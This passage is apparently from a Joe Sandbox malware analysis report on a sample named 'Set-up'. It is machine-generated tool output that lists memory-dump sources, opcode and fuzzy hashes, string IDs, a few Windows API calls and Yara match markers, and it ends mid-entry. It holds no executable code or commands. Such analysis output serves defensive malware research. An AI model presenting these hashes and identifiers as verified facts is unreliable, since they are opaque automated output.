                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0123456789ABCDEFXP$0123456789abcdefxp$@
                                                                                                                                  • API String ID: 0-1376090547
                                                                                                                                  • Opcode ID: 13b18c69891e57137047eb22e1a54d005c578c345a60199661603506a5f57ef9
                                                                                                                                  • Instruction ID: 7558b83fd5e4a67ea08178f0e06035dc33bb45b40951f76f710b6820f2f16b86
                                                                                                                                  • Opcode Fuzzy Hash: 13b18c69891e57137047eb22e1a54d005c578c345a60199661603506a5f57ef9
                                                                                                                                  • Instruction Fuzzy Hash: A6B19D76A0C3518FD714CF19C49466AFBF2BBCA318F088A1DE9A697341C7749D09CB82
                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,01124706), ref: 0112A198
                                                                                                                                  Strings
                                                                                                                                  • GetSystemTimePreciseAsFileTime, xrefs: 0112A174
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                  • API String ID: 2086374402-595813830
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X$\
                                                                                                                                  • API String ID: 0-249256547
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Inf$NaN
                                                                                                                                  • API String ID: 0-3500518849
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Tu0w$sq
                                                                                                                                  • API String ID: 0-1003487487
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+($%*+(
                                                                                                                                  • API String ID: 2994545307-3039692684
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+($%*+(
                                                                                                                                  • API String ID: 2994545307-3039692684
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 907"$5
                                                                                                                                  • API String ID: 0-1990719893
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.COMBASE(059239E8,00000000,00000001,059239D8), ref: 05901279
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F1ABA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: dc
                                                                                                                                  • API String ID: 0-2498989246
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: dc
                                                                                                                                  • API String ID: 0-2498989246
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: InA>
                                                                                                                                  • API String ID: 2994545307-2903657838
                                                                                                                                  • Opcode ID: cd4405e5ebc68d3ea19338919f4fd6aaacc129df7d36a72945abe8d06dc40f32
                                                                                                                                  • Instruction ID: c455ef3fcfc9392fe393ca0636674cd7266dcb6b04b6231faeac48706d39008f
                                                                                                                                  • Opcode Fuzzy Hash: cd4405e5ebc68d3ea19338919f4fd6aaacc129df7d36a72945abe8d06dc40f32
                                                                                                                                  • Instruction Fuzzy Hash: 2581177160C3199BD724CE28C88173BBBE7FBC8724F18892DE9DA87691D735D8428B45
                                                                                                                                  Strings
                                                                                                                                  • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0591188A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                                                                  • API String ID: 0-442858466
                                                                                                                                  • Opcode ID: b645e2a4c863a0618e5cb066ceb571a191bd7e1addf97d6b756b3ab0e23b204b
                                                                                                                                  • Instruction ID: b9f715cfdfef25ecdb11baff9932cb2d5262938efbb780151ded1922a23fed7b
                                                                                                                                  • Opcode Fuzzy Hash: b645e2a4c863a0618e5cb066ceb571a191bd7e1addf97d6b756b3ab0e23b204b
                                                                                                                                  • Instruction Fuzzy Hash: D7712733F299B957CB28C93C9C512B56E535F86230B2D8B65FE728B3D5CA188805D358
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+(
                                                                                                                                  • API String ID: 2994545307-3233224373
                                                                                                                                  • Opcode ID: fe773285dd6e614433dfca09a36de037f09aea8bfa2326f49be642acbece0302
                                                                                                                                  • Instruction ID: 658ddc6c88be15c826d24e8b39c6dda459e2a65ae4aa5babe7f1eb352a69fd98
                                                                                                                                  • Opcode Fuzzy Hash: fe773285dd6e614433dfca09a36de037f09aea8bfa2326f49be642acbece0302
                                                                                                                                  • Instruction Fuzzy Hash: B931E63435A310AFE7208E14DC8DF3BBBAAFB85714F68492CF58657189D260AC508655
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d8ef2529f96809b19b1413aeab3ef5f05fe8a830e5db1553fa6a68ad972e1ab4
                                                                                                                                  • Instruction ID: 03fafed8933108001c9b205d3142a5131b3ef7c9e371a67803ab0e01b0c79c96
                                                                                                                                  • Opcode Fuzzy Hash: d8ef2529f96809b19b1413aeab3ef5f05fe8a830e5db1553fa6a68ad972e1ab4
                                                                                                                                  • Instruction Fuzzy Hash: 8442B132A087158BC725DF28D88167AB3F2FFC6315F158A2DDD96D7281E734AC518B82
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: afdf1bcf9e70543a0f77e1fb6b9271418bda2bdcfb65a389072b417937841910
                                                                                                                                  • Instruction ID: 21a0e3becc32513e6fc2c3ec996ce12c38040785e376920c7b0a770748de9dd5
                                                                                                                                  • Opcode Fuzzy Hash: afdf1bcf9e70543a0f77e1fb6b9271418bda2bdcfb65a389072b417937841910
                                                                                                                                  • Instruction Fuzzy Hash: 99725CB1418B829ED3618F3DC845783FFE9AB5A320F184A5ED0FA87392C7756105CB62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 19aa032fcd7ea6aa6e44321dd9969020886aa13d37dee0af4581cbc0f142a49f
                                                                                                                                  • Instruction ID: 97d30c0c45c081817be10b00bdb76aaf1933c407bad91512e59c522c8c944733
                                                                                                                                  • Opcode Fuzzy Hash: 19aa032fcd7ea6aa6e44321dd9969020886aa13d37dee0af4581cbc0f142a49f
                                                                                                                                  • Instruction Fuzzy Hash: 7F32AFB16093449FE724CF15D885B6BBBE2FBC8704F14891CEA899B291D735EC01CB92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a7cdd89607bb83f585804e6672836a0293a8c522c4e47b5cd654e2931230c37d
                                                                                                                                  • Instruction ID: aa68fc7440d2b6b1897acb3c553c4a7b2e3a59d69780cbf4d2f0ef5f1fdcda56
                                                                                                                                  • Opcode Fuzzy Hash: a7cdd89607bb83f585804e6672836a0293a8c522c4e47b5cd654e2931230c37d
                                                                                                                                  • Instruction Fuzzy Hash: F052C770A087849FEB35CB24C4857A7BBF2BB42315F14482DD9E786B82C379AD85CB51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d47136a8b18e242b102edffef0ed0af83461eb2e82c1e980cbf108ef85e63996
                                                                                                                                  • Instruction ID: f1385bc9a7da69816050db0745be5adaddfbff768cbd3cc7cf868bdc10b40efa
                                                                                                                                  • Opcode Fuzzy Hash: d47136a8b18e242b102edffef0ed0af83461eb2e82c1e980cbf108ef85e63996
                                                                                                                                  • Instruction Fuzzy Hash: 5E421170614B108FC368CF29C59052ABBF2BB46714B944A2EDAA78BF90D736F845CF14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fcc242ccc775558139f23c4381e86e539602ee281ae36f54741a0a5ecdb75772
                                                                                                                                  • Instruction ID: 6bca447f2534c0f9f80c1283c8e53f73fb2c61db2433d9e79c9887d7545da017
                                                                                                                                  • Opcode Fuzzy Hash: fcc242ccc775558139f23c4381e86e539602ee281ae36f54741a0a5ecdb75772
                                                                                                                                  • Instruction Fuzzy Hash: 12F1AD756083418FD728CF29C88166BFBE6BFDA200F08882DE8D5C7751E639E944CB52
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 22f0bfba31a734ca7278d6fa84c49d951fe95b99fa740cfeb11139cac7585667
                                                                                                                                  • Instruction ID: ce67bb7da3cbb36c8fa06cb59bc34ec31534ce67c6783ece869eb33e4d2b33bb
                                                                                                                                  • Opcode Fuzzy Hash: 22f0bfba31a734ca7278d6fa84c49d951fe95b99fa740cfeb11139cac7585667
                                                                                                                                  • Instruction Fuzzy Hash: D5B10272A082109FD7249B28CC91B7B73E6FF85354F09582DE8869B2D1E7789D40D792
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e84e9e364182dd15bbe6aac3830e6c05f1869a173cf30154bbe8c790fed6ecd0
                                                                                                                                  • Instruction ID: abd11758ec5e64ddcc6426452cfbe709f61b27c8acd198942dcd46e321908d38
                                                                                                                                  • Opcode Fuzzy Hash: e84e9e364182dd15bbe6aac3830e6c05f1869a173cf30154bbe8c790fed6ecd0
                                                                                                                                  • Instruction Fuzzy Hash: 63B13A72A083109BDF18DF24C892BBB77E5FF82310F09496EE8869B394E7759905C752
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d90ac60bc0d140b6ecc7a2c2dd39d2abf086d270ed26b402527b1a8e3b9c8ec7
                                                                                                                                  • Instruction ID: 91573cb74e2851ed212adc4e46d109fefc60bb5bf024a23faa31b7e621cf8e46
                                                                                                                                  • Opcode Fuzzy Hash: d90ac60bc0d140b6ecc7a2c2dd39d2abf086d270ed26b402527b1a8e3b9c8ec7
                                                                                                                                  • Instruction Fuzzy Hash: 18A12B716183419BEF18CF2888926FB7FD2EF97210F14457EE8868B391E234E906C795
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d1d9c54743ab109cd481749becd5064847d31783dabe9adf18ed4a31d7fe10f4
                                                                                                                                  • Instruction ID: c05b6059953e64258f40e2383ab6e6444c0b99c5642cfb66963b6a9c2b0e1cd6
                                                                                                                                  • Opcode Fuzzy Hash: d1d9c54743ab109cd481749becd5064847d31783dabe9adf18ed4a31d7fe10f4
                                                                                                                                  • Instruction Fuzzy Hash: 23C16BB2A487418FC320CF68CC86BABB7F1BF85318F08492DD5D9C6242E778A555CB46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9d480ad416ac0570ef7a4c7c3aa173e4941ddd788d4c3e87038de4745b172ab5
                                                                                                                                  • Instruction ID: ed0d2681e722a9704f5b450010046b0f92d5b4e80ef4af5e8b328e533a4879e5
                                                                                                                                  • Opcode Fuzzy Hash: 9d480ad416ac0570ef7a4c7c3aa173e4941ddd788d4c3e87038de4745b172ab5
                                                                                                                                  • Instruction Fuzzy Hash: F8D11870610515ABC70ACF1DD495AF9B7F0FB48309F8182AEEA46E7385C738B925DB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f4ea4abbf94fd750a623faf1f6e1dd6ed191fea393cf66eab837ac8f44a29871
                                                                                                                                  • Instruction ID: d5994bef4c5d6e474197f2e073da4d1ad1d7f9d95bfe98aafb611b793d835de6
                                                                                                                                  • Opcode Fuzzy Hash: f4ea4abbf94fd750a623faf1f6e1dd6ed191fea393cf66eab837ac8f44a29871
                                                                                                                                  • Instruction Fuzzy Hash: 20D11870610515ABC70ACF1DD495AF9B7F0FB48309F8182AEEA46E7385C738B925DB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 45706e857b9c4100d8a89cd79f55dc8e0bf68388232efcd88ff6affa98231b87
                                                                                                                                  • Instruction ID: 3ff97435e4296b78a35b560df739588fdc4ea0b3ae08f3d7c4cb3aff82a915f0
                                                                                                                                  • Opcode Fuzzy Hash: 45706e857b9c4100d8a89cd79f55dc8e0bf68388232efcd88ff6affa98231b87
                                                                                                                                  • Instruction Fuzzy Hash: 778125716593409FE725CF08C4C5B7E7BA2FB98304F28491DEE828B256C6759D45CB82
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8eb59ba32e11c59fa52887d6e410879429124bd29b8c0d89caf05c0392e0e7ab
                                                                                                                                  • Instruction ID: 51a133eb6bf916dd844785defccfd8db61769a00222473aa24cad7333bde3289
                                                                                                                                  • Opcode Fuzzy Hash: 8eb59ba32e11c59fa52887d6e410879429124bd29b8c0d89caf05c0392e0e7ab
                                                                                                                                  • Instruction Fuzzy Hash: FD91B472A083558BE7258E55998032FB7E2BFA321CF19856DDC86CB252E7B0DC45C782
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8cd370d2bcb852d5ad378857f36e2923feb278f10598a34f360b5f35fe4f75a6
                                                                                                                                  • Instruction ID: 0db8cb098cda20828dcd667a136bdacdd94d326ed127db82e60f89aca3b637d1
                                                                                                                                  • Opcode Fuzzy Hash: 8cd370d2bcb852d5ad378857f36e2923feb278f10598a34f360b5f35fe4f75a6
                                                                                                                                  • Instruction Fuzzy Hash: 80814733A1D5A14FD738893C5C513B9AF971B97330F2D9F69E8B58B3D6C62989028390
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a594401adc708b28e4167fe3b21b9db26a6636ff48bc303fab4b16aa09ba636c
                                                                                                                                  • Instruction ID: b67f77108605ab6440d0f42c61a3954c45c13ea8229160bb48d6461ce1c5a5e9
                                                                                                                                  • Opcode Fuzzy Hash: a594401adc708b28e4167fe3b21b9db26a6636ff48bc303fab4b16aa09ba636c
                                                                                                                                  • Instruction Fuzzy Hash: 0281073BA195914BD715CA7C9C502FA6B635BA7230F2D937BD8B68B3D1D7298802C350
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 332f8346a76617310b07923a53bd3c628410c78c304e2fcc6c2a4c64230ae88f
                                                                                                                                  • Instruction ID: 23e22645473df686dbdd0260bb16a20c21ae690d16ad2fb0f795841df62f5c9d
                                                                                                                                  • Opcode Fuzzy Hash: 332f8346a76617310b07923a53bd3c628410c78c304e2fcc6c2a4c64230ae88f
                                                                                                                                  • Instruction Fuzzy Hash: 6F615837A083104BC764DE28CC81BABBBE2EBD5610F1D867ED8D59B385E631DC018795
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6294c4fc534ac63aa36da0a3afadc95febd69acf17b8a35cba3648a0fc2ff8f3
                                                                                                                                  • Instruction ID: 51ea3213170451f3edfbff2ddf91a1593ffcab69c525931953b4117d8d9bfb4d
                                                                                                                                  • Opcode Fuzzy Hash: 6294c4fc534ac63aa36da0a3afadc95febd69acf17b8a35cba3648a0fc2ff8f3
                                                                                                                                  • Instruction Fuzzy Hash: CB71C876B083185BEB64EA28DC84B7BBADDEBC1304F08492DFD55D7241EA35EC048796
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a353d2f910b8de00f5834b9bc65e200f88f02d0ecee4f63660ff0c85c2ed7a01
                                                                                                                                  • Instruction ID: a0873e58717b5025a73b46ede874dd27184794576d4746bbe497a029cffdae79
                                                                                                                                  • Opcode Fuzzy Hash: a353d2f910b8de00f5834b9bc65e200f88f02d0ecee4f63660ff0c85c2ed7a01
